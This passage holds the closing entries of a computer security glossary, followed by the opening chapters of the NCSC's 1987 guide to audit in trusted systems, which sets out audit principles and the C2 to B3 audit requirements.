circumvent the security features of a system.  The evaluators may be assumed
to use all system design and implementation documentation, which may include
listings of system source code, manuals, and circuit diagrams.  The evaluators
work under the same constraints applied to ordinary users.

periods processing

	The processing of various levels of sensitive information at
distinctly different times.  Under periods processing, the system must be
purged of all information from one processing period before transitioning to
the next when there are different users with differing authorizations.

permissions

	A description of the type of authorized interactions a subject can
have with an object.  Examples include: read, write, execute, add, modify, and
delete.

personnel security

	The procedures established to ensure that all personnel who have
access to sensitive information have the required authority as well as
appropriate clearances.

physical security

	The application of physical barriers and control procedures as
preventive measures or countermeasures against threats to resources and
sensitive information.

piggyback

	Gaining unauthorized access to a system via another user's
legitimate connection.  See between-the-lines entry.

Preferred Products List (PPL)

	A list of commercially produced equipments that meet TEMPEST and
other requirements prescribed by the National Security Agency.  This list is
included in the NSA Information Systems Security Products and Services
Catalogue, issued quarterly and available through the Government Printing
Office.

print suppression

 	Eliminating the displaying of characters in order to preserve their
secrecy; e.g., not displaying the characters of a password as it is keyed at
the input terminal.

privileged instructions

	A set of instructions (e.g., interrupt handling or special computer
instructions) to control features (such as storage protection features) that
are generally executable only when the automated system is operating in the
executive state.

procedural security

	Synonymous with administrative security.

process

 	 A program in execution. See domain and subject.

protection philosophy

	An informal description of the overall design of a system that
delineates each of the protection mechanisms employed.  A combination,
appropriate to the evaluation class, of formal and informal techniques is used
to show that the mechanisms are adequate to enforce the security policy.

protection ring

	One of a hierarchy of privileged modes of a system that gives
certain access rights to user programs and processes authorized to operate in
a given mode.

protection-critical portions of the TCB

	Those portions of the TCB whose normal function is to deal with the
control of access between subjects and objects.  Their correct operation is
essential to the protection of the data on the system.

protocols

	A set of rules and formats, semantic and syntactic, that permits
entities to exchange information.

pseudo-flaw

	An apparent loophole deliberately implanted in an operating system
program as a trap for intruders.

Public Law 100-235 (P.L. 100-235)

	Also known as the Computer Security Act of 1987, this law creates a
means for establishing minimum acceptable security practices for improving the
security and privacy of sensitive information in federal computer systems.
This law assigns to the National Institute of Standards and Technology
responsibility for developing standards and guidelines for federal computer
systems processing unclassified data.  The law also requires establishment of
security plans by all operators of federal computer systems that contain
sensitive information.

purge

	The removal of sensitive data from an AIS, AIS storage device, or
peripheral device with storage capacity, at the end of a processing period.
This action is performed in such a way that there is assurance proportional to
the sensitivity of the data that the data may not be reconstructed.  An AIS
must be disconnected from any external network before a purge.  After a purge,
the medium can be declassified by observing the review procedures of the
respective agency.

-Q-

This document contains no entries beginning with the letter.

-R-

read

	A fundamental operation that results only in the flow of information
from an object to a subject.

read access

	Permission to read information.

recovery procedures

	The actions necessary to restore a system's computational capability
and data files after a system failure.

reference monitor concept

	An access-control concept that refers to an abstract machine that
mediates all accesses to objects by subjects.

reference validation mechanism

	An implementation of the reference monitor concept.  A security
kernel is a type of reference validation mechanism.

reliability

	The probability of a given system performing its mission adequately
for a specified period of time under the expected operating conditions.

residual risk

	The portion of risk that remains after security measures have been
applied.

residue

	Data left in storage after processing operations are complete, but
before degaussing or rewriting has taken place.

resource encapsulation

	The process of ensuring that a resource not be directly accessible
by a subject, but that it be protected so that the reference monitor can
properly mediate accesses to it.  

restricted area

	Any area to which access is subject to special restrictions or
controls for reasons of security or safeguarding of property or material.

risk

	The probability that a particular threat will exploit a particular
vulnerability of the system.

risk analysis

	The process of identifying security risks, determining their
magnitude, and identifying areas needing safeguards.  Risk analysis is a part
of risk management.  Synonymous with risk assessment.

risk assessment

  	 Synonymous with risk analysis.

risk index

	The disparity between the minimum clearance or authorization of
system users and the maximum sensitivity (e.g., classification and categories)
of data processed by a system.  See CSC-STD-003-85 and CSC-STD-004-85 for a
complete explanation of this term.

risk management

	The total process of identifying, controlling, and eliminating or
minimizing uncertain events that may affect system resources.  It includes
risk analysis, cost benefit analysis, selection, implementation and test,
security evaluation of safeguards, and overall security review.  

-S-

safeguards

	See security safeguards.

scavenging

	Searching through object residue to acquire unauthorized data.

secure configuration management

	The set of procedures appropriate for controlling changes to a
system's hardware and software structure for the purpose of ensuring that
changes will not lead to violations of the system's security policy.

secure state

	A condition in which no subject can access any object in an
unauthorized manner.

secure subsystem

	A subsystem that contains its own implementation of the reference
monitor concept for those resources it controls.  However, the secure
subsystem must depend on other controls and the base operating system for the
control of subjects and the more primitive system objects.

security critical mechanisms

	Those security mechanisms whose correct operation is necessary to
ensure that the security policy is enforced.

security evaluation

	An evaluation done to assess the degree of trust that can be placed
in systems for the secure handling of sensitive information.  One type, a
product evaluation, is an evaluation performed on the hardware and software
features and assurances of a computer product from a perspective that excludes
the application environment.  The other type, a system evaluation, is done for
the purpose of assessing a system's security safeguards with respect to a
specific operational mission and is a major step in the certification and
accreditation process.

security fault analysis

	A security analysis, usually performed on hardware at gate level, to
determine the security properties of a device when a hardware fault is
encountered.  

security features

	The security-relevant functions, mechanisms, and characteristics of
system hardware and software.  Security features are a subset of system
security safeguards.

security filter

	A trusted subsystem that enforces a security policy on the data that
pass through it.

security flaw

 	An error of commission or omission in a system that may allow
protection mechanisms to be bypassed.

security flow analysis

	A security analysis performed on a formal system specification that
locates potential flows of information within the system.

security kernel

	The hardware, firmware, and software elements of a TCB that
implement the reference monitor concept.  It must mediate all accesses, be
protected from modification, and be verifiable as correct.

security label

  	 A piece of information that represents the security level of an
object.

security level

	The combination of a hierarchical classification and a set of
nonhierarchical categories that represents the sensitivity of information.

security measures

	Elements of software, firmware, hardware, or procedures that are
included in a system for the satisfaction of security specifications.

security perimeter

	The boundary where security controls are in effect to protect
assets.

security policy

	The set of laws, rules, and practices that regulate how an
organization manages, protects, and distributes sensitive information.

security policy model

	A formal presentation of the security policy enforced by the system.
It must identify the set of rules and practices that regulate how a system
manages, protects, and distributes sensitive information.  See Bell-La Padula
model and formal security policy model.

security range

	The highest and lowest security levels that are permitted in or on a
system, system component, subsystem or network.

security requirements

	The types and levels of protection necessary for equipment, data,
information, applications, and facilities to meet security policy.

security requirements baseline

	A description of minimum requirements necessary for a system to
maintain an acceptable level of security.

security safeguards

	The protective measures and controls that are prescribed to meet the
security requirements specified for a system.  Those safeguards may include
but are not necessarily limited to: hardware and software security features,
operating procedures, accountability procedures, access and distribution
controls, management constraints, personnel security, and physical structures,
areas, and devices.  Also called safeguards.

security specifications

	A detailed description of the safeguards required to protect a
system.

security test and evaluation

	An examination and analysis of the security safeguards of a system
as they have been applied in an operational environment to determine the
security posture of the system.

security testing

	A process used to determine that the security features of a system
are implemented as designed.  This includes hands-on functional testing,
penetration testing, and verification.

sensitive information

	Any information, the loss, misuse, modification of, or unauthorized
access to, could affect the national interest or the conduct of Federal
programs, or the privacy to which individuals are entitled under Section 552a
of Title 5, U.S.  Code, but that has not been specifically authorized under
criteria established by an Executive order or an act of Congress to be kept
classified in the interest of national defense or foreign policy.

 sensitivity label

	A piece of information that represents the security level of an
object.  Sensitivity labels are used by the TCB as the basis for mandatory
access control decisions.

simple security condition

	See simple security property.

simple security property

	A Bell-La Padula security model rule allowing a subject read access
to an object only if the security level of the subject dominates the security
level of the object.  Synonymous with simple security condition.

single-level device

	An automated information systems device that is used to process data
of a single security level at any one time.

Software Development Methodologies

	Methodologies for specifying and verifying design programs for
system development.  Each methodology is written for a specific computer
language.  See Enhanced Hierarchical Development Methodology, Formal
Development Methodology, Gypsy Verification Environment and Hierarchical
Development Methodology.

software security

 	General purpose (executive, utility or software development tools)
and applications programs or routines that protect data handled by a system.

software system test and evaluation process

 	A process that plans, develops and documents the quantitative
demonstration of the fulfillment of all baseline functional performance,
operational and interface requirements.

spoofing

	An attempt to gain access to a system by posing as an authorized
user.  Synonymous with impersonating, masquerading or.mimicking.

stand-alone, shared system

	A system that is physically and electrically isolated from all other
systems, and is intended to be used by more than one person, either
simultaneously (e.g., a system with multiple terminals) or serially, with data
belonging to one user remaining available to the system while another user is
using the system (e.g., a personal computer with nonremovable storage media
such as a hard disk).

stand-alone, single-user system

	A system that is physically and electrically isolated from all other
systems, and is intended to be used by one person at a time, with no data
belonging to other users remaining in the system (e.g., a personal computer
with removable storage media such as a floppy disk).

star property 

	See *-property, page 2.

State Delta Verification System

	A system designed to give high confidence regarding microcode
performance by using formulae that represent isolated states of a computation
to check proofs concerning the course of that computation.

state variable

	A variable that represents either the state of the system or the
state of some system resource.

storage object

	An object that supports both read and write accesses.

Subcommittee on Automated Information Systems Security (SAISS)

	NSDD-145 authorizes and directs the establishment, under the NTISSC,
of a permanent Subcommittee on Automated Information Systems Security.  The
SAISS is composed of one voting member from each organization represented on
the NTISSC.

Subcommittee on Telecommunications Security (STS)

	NSDD-145 authorizes and directs the establishment, under the NTISSC,
of a permanent Subcommittee on Telecommunications Security.  The STS is
composed of one voting member from each organization represented on the
NTISSC.

subject

	An active entity, generally in the form of a person, process, or
device, that causes information to flow among objects or changes the system
state.  Technically, a process/domain pair.

subject security level

	A subjects security level is equal to the security level of the
objects to which it has both read and write access.  A subjects security level
must always be dominated by the clearance of the user with which the subject
is associated.

supervisor state

	Synonymous with executive state.

System Development Methodologies

 	Methodologies developed through software engineering to manage the
complexity of system development.  Development methodologies include software
engineering aids and high-level design analysis tools.

system high security mode

	See modes of operation.

 system integrity

	The quality that a system has when it performs its intended function
in an unimpaired manner, free from deliberate or inadvertent unauthorized
manipulation of the system.

system low

	The lowest security level supported by a system at a particular time
or in a particular environment.

System Security Officer (SSO)

	See Information System Security Officer. 

Systems Security Steering Group

	The senior government body established by NSDD-145 to provide
top-level review and policy guidance for the telecommunications security and
automated information systems security activities of the U.S.  Government.
This group is chaired by the Assistant to the President for National Security
Affairs and consists of the Secretary of State, Secretary of Treasury, the
Secretary of Defense, the Attorney General, the Director of the Office of
Management and Budget, and the Director of Central Intelligence.

-T-

tampering

	An unauthorized modification that alters the proper functioning of
an equipment or system in a manner that degrades the security or functionality
it provides.

technical attack

	An attack that can be perpetrated by circumventing or nullifying
hardware and software protection mechanisms, rather than by subverting system
personnel or other users.

technical vulnerability

	A hardware, firmware, communication, or software flaw that leaves a
computer processing system open for potential exploitation, either externally
or internally, thereby resulting in risk for the owner, user, or manager of
the system.

TEMPEST

	The study and control of spurious electronic signals emitted by
electrical equipment.

terminal identification

	The means used to uniquely identify a terminal to a system.

threat

	Any circumstance or event with the potential to cause harm to a
system in the form of destruction, disclosure, modification of data, and/or
denial of service.

threat agent

	A method used to exploit a vulnerability in a system, operation, or
facility.

threat analysis

	The examination of all actions and events that might adversely
affect a system or operation.

threat monitoring

	The analysis, assessment, and review of audit trails and other data
collected for the purpose of searching out system events that may constitute
violations or attempted violations of system security.

ticket-oriented

	A computer protection system in which each subject maintains a list
of unforgeable bit patterns, called tickets, one for each object the subject
is authorized to access.  Compare list-oriented.

time-dependent password

	A password that is valid only at a certain time of day or during a
specified interval of time.

top-level specification

	A nonprocedural description of system behavior at the most abstract
level; typically, a functional specification that omits all implementation
details.

tranquility

	A security model rule stating that the security level of an object
cannot change while the object is being processed by an AIS.

trap door

	A hidden software or hardware mechanism that can be triggered to
permit system protection mechanisms to be circumvented.  It is activated in
some innocent-appearing manner; e.g., a special "random" key sequence at a
terminal.  Software developers often introduce trap doors in their code to
enable them to reenter the system and perform certain functions.  Synonymous
with back door.

Trojan horse

	A computer program with an apparently or actually useful function
that contains additional (hidden) functions that surreptitiously exploit the
legitimate authorizations of the invoking process to the detriment of security
or integrity.

trusted computer system

	A system that employs sufficient hardware and software assurance
measures to allow its use for simultaneous processing of a range of sensitive
or classified information.

Trusted Computing Base (TCB)

	The totality of protection mechanisms within a computer system,
including hardware, firmware, and software, the combination of which is
responsible for enforcing a security policy.  A TCB consists of one or more
components that together enforce a unified security policy over a product or
system.  The ability of a TCB to enforce correctly a unified security policy
depends solely on the mechanisms within the TCB and on the correct input by
system administrative personnel of parameters (e.g., a user's clearance level)
related to the security policy.

trusted distribution

 	 A trusted method for distributing the TCB hardware, software, and
firmware components, both originals and updates, that provides methods for
protecting the TCB from modification during distribution and for detection of
any changes to the TCB that may occur.

 trusted identification forwarding

	An identification method used in networks whereby the sending host
can verify that an authorized user on its system is attempting a connection to
another host.  The sending host transmits the required user authentication
information to the receiving host.  The receiving host can then verify that
the user is validated for access to its system.  This operation may be
transparent to the user.

trusted path

 	 A mechanism by which a person at a terminal can communicate
directly with the TCB.  This mechanism can only be activated by the person or
the TCB and cannot be imitated by untrusted software.

trusted process

	A process whose incorrect or malicious execution is capable of
violating system security policy.

trusted software

	The software portion of the TCB. 

-U-

untrusted process

	A process that has not been evaluated or examined for adherence to
the secuity policy.  It may include incorrect or malicious code that attempts
to circumvent the security mechanisms.

user

	Person or process accessing an AIS either by direct connections
(i.e., via terminals), or indirect connections (i.e., prepare input data or
receive output that is not reviewed for content or classification by a
responsible individual).

user ID

	A unique symbol or character string that is used by a system to
identify a specific user.

user profile

	Patterns of a user's activity that can be used to detect changes in
normal routines.  

-V-

verification

	The process of comparing two levels of system specification for
proper correspondence (e.g., security policy model with top-level
specification, top-level specification with source code, or source code with
object code).  This process may or may not be automated.

virus

	A self-propagating Trojan horse, composed of a mission component, a
trigger component, and a self-propagating component.

vulnerability

	A weakness in system security procedures, system design,
implementation, internal controls, etc., that could be exploited to violate
system security policy.

vulnerability analysis

	The systematic examination of systems in order to determine the
adequacy of security measures, identify security deficiencies, and provide
data from which to predict the effectiveness of proposed security measures.

vulnerability assessment

 	A measurement of vulnerability which includes the susceptibility of
a particular system to a specific attack and the opportunities available to a
threat agent to mount that attack.  

-W-

work factor

	An estimate of the effort or time needed by a potential penetrator
with specified expertise and resources to overcome a protective measure.

write

	A fundamental operation that results only in the flow of information
from a subject to an object.

write access

	Permission to write to an object.

-X,Y,Z-

This document contains no entries beginning with the letters  X, Y, or Z.

The Tan Book: A Guide to Understanding Audit in Trusted Systems

 

                                              NCSC-TG-001 
                                         Library No. S-228,470 

                          FOREWORD 

This publication, "A Guide to Understanding Audit in Trusted 
Systems," is being issued by the National Computer Security 
Center (NCSC) under the authority of and in accordance with 
Department of Defense (DoD) Directive 5215.1.  The guidelines 
described in this document provide a set of good practices 
related to the use of auditing in automatic data processing 
systems employed for processing classified and other sensitive 
information. Recommendations for revision to this guideline are 
encouraged and will be reviewed biannually by the National 
Computer Security Center through a formal review process.  
Address all proposals for revision through appropriate channels 
to:  

       National Computer Security Center 
       9800 Savage Road 
       Fort George G. Meade, MD  20755-6000  

       Attention: Chief, Computer Security Technical Guidelines 

_________________________________ 
Patrick R. Gallagher, Jr.                     28 July 1987 
Director 
National Computer Security Center  

                                   i 

                          ACKNOWLEDGEMENTS 

Special recognition is extended to James N. Menendez, National 
Computer Security Center (NCSC), as project manager of the 
preparation and production of this document. 

Acknowledgement is also given to the NCSC Product Evaluations 
Team who provided the technical guidance that helped form this 
document and to those members of the computer security community 
who contributed their time and expertise by actively
participating in the review of this document. 

                                   ii 

                          CONTENTS 

FOREWORD ...................................................  i 

ACKNOWLEDGEMENTS ...........................................  ii 

CONTENTS ...................................................  iii

PREFACE .....................................................  v 

1. INTRODUCTION .............................................  1 

    1.1 HISTORY OF THE NATIONAL COMPUTER SECURITY CENTER ....  1 
    1.2 GOAL OF THE NATIONAL COMPUTER SECURITY CENTER .......  1 

2. PURPOSE ..................................................  2 

3. SCOPE ....................................................  3 

4. CONTROL OBJECTIVES .......................................  4 

5. OVERVIEW OF AUDITING PRINCIPLES ..........................  8 

    5.1 PURPOSE OF THE AUDIT MECHANISM.......................  8 
    5.2 USERS OF THE AUDIT MECHANISM.........................  8 
    5.3 ASPECTS OF EFFECTIVE AUDITING .......................  9 

         5.3.1 Identification/Authentication ................  9 
         5.3.2 Administrative ...............................  10
         5.3.3 System Design ................................  10

    5.4 SECURITY OF THE AUDIT ...............................  10 

6. MEETING THE CRITERIA REQUIREMENTS ........................  12

    6.1 THE C2 AUDIT REQUIREMENT ............................  12

         6.1.1 Auditable Events .............................  12
         6.1.2 Auditable Information ........................  12
         6.1.3 Audit Basis ..................................  13

    6.2 THE B1 AUDIT REQUIREMENT ............................  13

         6.2.1 Auditable Events .............................  13
         6.2.2 Auditable Information ........................  13
         6.2.3 Audit Basis ..................................  14

                                  iii 

                          CONTENTS (Continued) 

    6.3 THE B2 AUDIT REQUIREMENT ............................  14

         6.3.1 Auditable Events .............................  14
         6.3.2 Auditable Information ........................  14
         6.3.3 Audit Basis ..................................  14

    6.4 THE B3 AUDIT REQUIREMENT ............................  15

         6.4.1 Auditable Events .............................  15
         6.4.2 Auditable Information ........................  15
         6.4.3 Audit Basis ..................................  15

    6.5 THE A1 AUDIT REQUIREMENT ............................  16

         6.5.1 Auditable Events .............................  16
         6.5.2 Auditable Information ........................  16
         6.5.3 Audit Basis ..................................  16 

7. POSSIBLE IMPLEMENTATION METHODS ..........................  17

    7.1 PRE/POST SELECTION OF AUDITABLE EVENTS ..............  17 

         7.1.1 Pre-Selection ................................  17
         7.1.2 Post-Selection ...............................  18

    7.2 DATA COMPRESSION ....................................  18
    7.3 MULTIPLE AUDIT TRAILS ...............................  19
    7.4 PHYSICAL STORAGE ....................................  19
    7.5 WRITE-ONCE DEVICE ...................................  20
    7.6 FORWARDING AUDIT DATA ...............................  21

8. OTHER TOPICS .............................................  22

    8.1 AUDIT DATA REDUCTION ................................  22
    8.2 AVAILABILITY OF AUDIT DATA ..........................  22
    8.3 AUDIT DATA RETENTION ................................  22
    8.4 TESTING .............................................  23
    8.5 DOCUMENTATION .......................................  23
    8.6 UNAVOIDABLE SECURITY RISKS ..........................  24

         8.6.1 Auditing Administrators/Insider Threat .......  24 
         8.6.2 Data Loss ....................................  25

9. AUDIT SUMMARY ...........................................  26 

GLOSSARY

REFERENCES ..............................................  27 

                          PREFACE                

Throughout this guideline there will be recommendations made that
are not included in the Trusted Computer System Evaluation 
Criteria (the Criteria) as requirements.  Any recommendations 
that are not in the Criteria will be prefaced by the word 
"should," whereas all requirements will be prefaced by the word 
"shall."  It is hoped that this will help to avoid any confusion.

                                   v 
                                                                1

1.   INTRODUCTION 

1.1   History of the National Computer Security Center 

The DoD Computer Security Center (DoDCSC) was established in 
January 1981 for the purpose of expanding on the work started by 
the DoD Security Initiative.  Accordingly, the Director, National
Computer Security Center, has the responsibility for establishing
and publishing standards and guidelines for all areas of computer
security.  In 1985, DoDCSC's name was changed to the National 
Computer Security Center to reflect its responsibility for 
computer security throughout the federal government. 

1.2   Goal of the National Computer Security Center 

The main goal of the National Computer Security Center is to 
encourage the widespread availability of trusted computer 
systems.  In support of that goal a metric was created, the DoD 
Trusted Computer System Evaluation Criteria (the Criteria), 
against which computer systems could be evaluated for security.  
The Criteria was originally published on 15 August 1983 as CSC- 
STD-001-83.  In December 1985 the DoD adopted it, with a few 
changes, as a DoD Standard, DoD 5200.28-STD.  DoD Directive 
5200.28, "Security Requirements for Automatic Data Processing 
(ADP) Systems" has been written to, among other things, require 
the Department of Defense Trusted Computer System Evaluation 
Criteria to be used throughout the DoD.  The Criteria is the 
standard used for evaluating the effectiveness of security 
controls built into ADP systems.  The Criteria is divided into 
four divisions: D, C, B, and A, ordered in a hierarchical manner 
with the highest division (A) being reserved for systems 
providing the best available level of assurance.  Within 
divisions C and B there are a number of subdivisions known as 
classes, which are also ordered in a hierarchical manner to 
represent different levels of security in these classes.   

2.   PURPOSE 

For Criteria classes C2 through A1 the Criteria requires that a 
user's actions be open to scrutiny by means of an audit.  The 
audit process of a secure system is the process of recording, 
examining, and reviewing any or all security-relevant activities 
on the system.  This guideline is intended to discuss issues 
involved in implementing and evaluating an audit mechanism.  The 
purpose of this document is twofold.  It provides guidance to 
manufacturers on how to design and incorporate an effective audit
mechanism into their system, and it provides guidance to 
implementors on how to make effective use of the audit 
                                1

capabilities provided by trusted systems.  This document contains
suggestions as to what information should be recorded on the 
audit trail, how the audit should be conducted, and what 
protective measures should be accorded to the audit resources. 

Any examples in this document are not to be construed as the only
implementations that will satisfy the Criteria requirement.  The 
examples are merely suggestions of appropriate implementations.  
The recommendations in this document are also not to be construed
as supplementary requirements to the Criteria. The Criteria is 
the only metric against which systems are to be evaluated.   

This guideline is part of an on-going program to provide helpful 
guidance on Criteria issues and the features they address. 

3.   SCOPE 

An important security feature of Criteria classes C2 through A1 
is the ability of the ADP system to audit any or all of the 
activities on the system.  This guideline will discuss auditing 
and the features of audit facilities as they apply to computer 
systems and products that are being built with the intention of 
meeting the requirements of the Criteria. 

                                2 

4.  CONTROL OBJECTIVES

The Trusted Computer System Evaluation Criteria gives the 
following as the Accountability Control Objective: 

    "Systems that are used to process or handle classified or 
     other sensitive information must assure individual          
     accountability whenever either a mandatory or               
     discretionary security policy is invoked.  Furthermore, to  
     assure accountability the capability must exist for an 
     authorized and competent agent to access and evaluate       
     accountability information by a secure means, within a      
     reasonable amount of time and without undue difficulty."(1) 

The Accountability Control Objective as it relates to auditing 
leads to the following control objective for auditing: 

    "A trusted computer system must provide authorized personnel 
     with the ability to audit any action that can potentially  
     cause access to, generation of, or effect the release 
     of classified or sensitive information.  The audit 
     data will be selectively acquired based on the auditing 
     needs of a particular installation and/or application.      
     However, there must be sufficient granularity in the audit  
     data to support tracing the auditable events to a specific  
     individual (or process) who has taken the actions or on     
     whose behalf the actions were taken."(1)   

                                3 

5.   OVERVIEW OF AUDITING PRINCIPLES 

Audit trails are used to detect and deter penetration of a
computer system and to reveal usage that identifies misuse.  At
the discretion of the auditor, audit trails may be limited to
specific events or may encompass all of the activities on a
system.  Although not required by the TCSEC, it should be
possible for the target of the audit mechanism to be either a
subject or an object.  That is to say, the audit mechanism should
be capable of monitoring every time John accessed the system as
well as every time the nuclear reactor file was accessed; and
likewise every time John accessed the nuclear reactor file. 

5.1   Purpose of the Audit Mechanism 

The audit mechanism of a computer system has five important
security goals.  First, the audit mechanism must "allow the
review of patterns of access to individual objects, access
histories of specific processes and individuals, and the use of
the various protection mechanisms supported by the system and
their effectiveness."(2)  Second, the audit mechanism must allow
discovery of both users' and outsiders' repeated attempts to
bypass the protection mechanisms.  Third, the audit mechanism
must allow discovery of any use of privileges that may occur when
a user assumes a functionality with privileges greater than his
or her own, i.e., programmer to administrator.  In this case
there may be no bypass of security controls but nevertheless a
violation is made possible.  Fourth, the audit mechanism must act
as a deterrent against perpetrators' habitual attempts to bypass
the system protection mechanisms.  However, to act as a
deterrent, the perpetrator must be aware of the audit mechanism's
existence and its active use to detect any attempts to bypass
system protection mechanisms.  The fifth goal of the audit
mechanism is to supply "an additional form of user assurance that
attempts to bypass the protection mechanisms are recorded and
discovered."(2)  Even if the attempt to bypass the protection
mechanism is successful, the audit trail will still provide
assurance by its ability to aid in assessing the damage done by
the violation, thus improving the system's ability to control the
damage. 

5.2.  Users of the Audit Mechanism 

"The users of the audit mechanism can be divided into two groups. 
The first group consists of the auditor, who is an individual
with administrative duties, who selects the events to be audited
on the system, sets up the audit flags which enable the recording

                                4

of those events, and analyzes the trail of audit events."(2)  In
some systems the duties of the auditor may be encompassed in the
duties of the system security administrator.  Also, at the lower
classes, the auditor role may be performed by the system
administrator.  This document will refer to the person
responsible for auditing as the system security administrator,
although it is understood that the auditing guidelines may apply
to system administrators and/or system security administrators
and/or a separate auditor in some ADP systems.   

"The second group of users of the audit mechanism consists of the
system users themselves; this group includes the administrators,
the operators, the system programmers, and all other users.  They
are considered users of the audit mechanism not only because
they, and their programs, generate audit events,"(2) but because
they must understand that the audit mechanism exists and what
impact it has on them.  This is important because otherwise the
user deterrence and user assurance goals of the audit mechanism
cannot be achieved.    

5.3  Aspects of Effective Auditing 

5.3.1.  Identification/Authentication 

 Logging in on a system normally requires that a user enter the 
specified form of identification (e.g., login ID, magnetic strip) 
and a password (or some other mechanism) for authentication. 
Whether this information is valid or invalid, the execution of
the login procedure is an auditable event and the identification
entered may be considered to be auditable information.  It is
recommended that authentication information, such as passwords,
not be forwarded to the audit trail.  In the event that the
identification entered is not recognized as being valid, the
system should also omit this information from the audit trail. 
The reason for this is that a user may have entered a password
when the system expected a login ID.  If the information had been
written to the audit trail, it would compromise the password and
the security of the user. 

There are, however, environments where the risk involved in 
recording invalid identification information is reduced.  In
systems that support formatted terminals, the likelihood of
password entry in the identification field is markedly reduced,
hence the recording of identification information would pose no
major threat.  The benefit of recording the identification
information is that break-in attempts would be easier to detect
and identifying the perpetrator would also be assisted.  The 

                                 5

information gathered here may be necessary for any legal 
prosecution that may follow a security  violation.    

5.3.2  Administrative 

All systems rated at class C2 or higher shall have audit 
capabilities and personnel designated as responsible for the
audit procedures.  For the C2 and B1 classes, the duties of the
system operators could encompass all functions including those of
the auditor.  Starting at the B2 class, there is a requirement
for the TCB to support separate operator and administrator
functions.  In addition, at the B3 class and above, there is a
requirement to identify the system security administrator
functions.  When one assumes the system security administrator
role on the system, it shall be after taking distinct auditable
action, e.g., login procedure.  When one with the privilege of
assuming the role is on the system, the act of assuming that role
shall also be an auditable event. 

5.3.3   System Design 

The system design should include a mechanism to invoke the audit 
function at the request of the system security administrator.  A 
mechanism should also be included to determine if the event is to
be selected for inclusion as an audit trail entry.  If
pre-selection of events is not implemented, then all auditable
events should be forwarded to the audit trail.  The Criteria
requirement for the administrator to be able to select events
based on user identity and/or object security classification must
still be able to be satisfied.  This requirement can be met by
allowing post-selection of events through the use of queries. 
Whatever reduction tool is used to analyze the audit trail shall
be provided by the vendor.  

5.4   Security of the Audit 

Audit trail software, as well as the audit trail itself, should
be protected by the Trusted Computing Base and should be subject
to strict access controls.  The security requirements of the
audit mechanism are the following: 

(1)  The event recording mechanism shall be part of the TCB and  
     shall be protected from unauthorized modification or        
     circumvention. 

(2)  The audit trail itself shall be protected by the TCB from   

                                 6

     unauthorized access (i.e., only the audit personnel may     
     access the audit trail).  The audit trail shall also be     
     protected from unauthorized modification.  

(3)  The audit-event enabling/disabling mechanism shall be part  
     of the TCB and shall remain inaccessible to the unauthorized 
     users.(2)  

At a minimum, the data on the audit trail should be considered to
be sensitive, and the audit trail itself shall be considered to
be as sensitive as the most sensitive data contained in the
system. 

When the medium containing the audit trail is physically removed 
from the ADP system, the medium should be accorded the physical 
protection required for the highest sensitivity level of data 
contained in the system. 

                                 7 

6.   MEETING THE CRITERIA REQUIREMENTS 

This section of the guideline will discuss the audit requirements
in the Criteria and will present a number of additional 
recommendations.  There are four levels of audit requirements. 
The first level is at the C2 Criteria class and the requirements 
continue evolving through the B3 Criteria class.   At each of
these levels, the guideline will list some of the events which
should be auditable, what information should be on the audit
trail, and on what basis events may be selected to be audited. 
All of the requirements will be prefaced by the word "shall," and
any additional recommendations will be prefaced by the word
"should." 

6.1   The C2 Audit Requirement 

6.1.1   Auditable Events 

The following events shall be subject to audit at the C2 class:  

   * Use of identification and authentication mechanisms 

   * Introduction of objects into a user's address space  

   * Deletion of objects from a user's address space 

   * Actions taken by computer operators and system              
     administrators and/or system security administrators    

   * All security-relevant events (as defined in Section 5 of    
     this guideline) 

   * Production of printed output 

6.1.2   Auditable Information 

The following information shall be recorded on the audit trail at
the C2 class:  

   * Date and time of the event 

   * The unique identifier on whose behalf the subject generating 
     the event was operating 

   * Type of event 

   * Success or failure of the event 

                                8

   * Origin of the request (e.g., terminal ID) for               
     identification/authentication events 

   * Name of object introduced, accessed, or deleted from a      
    user's address space 

   * Description of modifications made by the system             
     administrator to the user/system security databases   

6.1.3   Audit Basis 

At the C2 level, the ADP System Administrator shall be able to
audit based on individual identity. 

The ADP System Administrator should also be able to audit based
on object identity. 

6.2   The B1 Audit Requirement 

6.2.1   Auditable Events 

The Criteria specifically adds the following to the list of
events that shall be auditable at the B1 class: 

   * Any override of human readable output markings (including   
     overwrite of sensitivity label markings and the turning off 
     of labelling capabilities) on paged, hard-copy output       
   devices 

   * Change of designation (single-level to/from multi-level) of 
     any communication channel or I/O device 

   * Change of sensitivity level(s) associated with a            
   single-level communication channel or I/O device 

   * Change of range designation of any multi-level communication 
     channel or I/O device  

6.2.2   Auditable Information 

The Criteria specifically adds the following to the list of 
information that shall be recorded on the audit trail at the B1  
class: 

   * Security level of the object 

                                 9 

The following information should also be recorded on the audit
trail at the B1 class: 

   * Subject sensitivity level  

6.2.3   Audit Basis 

In addition to previous selection criteria, at the B1 level the 
Criteria specifically requires that the ADP System Administrator 
shall be able to audit based on individual identity and/or object
security level. 

6.3   The B2 Audit Requirement 

6.3.1   Auditable Events 

The Criteria specifically adds the following to the list of
events that shall be auditable at the B2 class: 

   * Events that may exercise covert storage channels  

6.3.2   Auditable Information 

No new requirements have been added at the B2 class. 

6.3.3   Audit Basis 

In addition to previous selection criteria, at the B2 level the 
Criteria specifically requires that "the TCB shall be able to
audit the identified events that may be used in the exploitation
of covert storage channels."  The Trusted Computing Base shall
audit covert storage channels that exceed ten bits per second.(1) 

The Trusted Computing Base should also provide the capability to 
audit the use of covert storage mechanisms with bandwidths that
may exceed a rate of one bit in ten seconds.  

6.4   The B3 Audit Requirement 

6.4.1   Auditable Events 

The Criteria specifically adds the following to the list of
events that shall be auditable at the B3 class: 

   * Events that may indicate an imminent violation of the 

                                10

     system's security policy (e.g., exercise covert timing      
     channels) 

6.4.2   Auditable Information 

No new requirements have been added at the B3 class. 

6.4.3   Audit Basis 

In addition to previous selection criteria, at the B3 level the  
Criteria specifically requires that "the TCB shall contain a 
mechanism that is able to monitor the occurrence or accumulation
of security auditable events that may indicate an imminent
violation of security policy.  This mechanism shall be able to
immediately notify the system security administrator when
thresholds are exceeded and, if the occurrence or accumulation of
these security-relevant events continues, the system shall take
the least disruptive action to terminate the event."(1)     

Events that would indicate an imminent security violation would 
include events that utilize covert timing channels that may
exceed a rate of ten bits per second and any repeated
unsuccessful login attempts.   

Being able to immediately notify the system security
administrator when thresholds are exceeded means that the
mechanism shall be able to recognize, report, and respond to a
violation of the security policy more rapidly than required at
lower levels of the Criteria, which usually only requires the
System Security Administrator to review an audit trail at some
time after the event.  Notification of the violation "should be
at the same priority as any other TCB message to an operator."(5) 

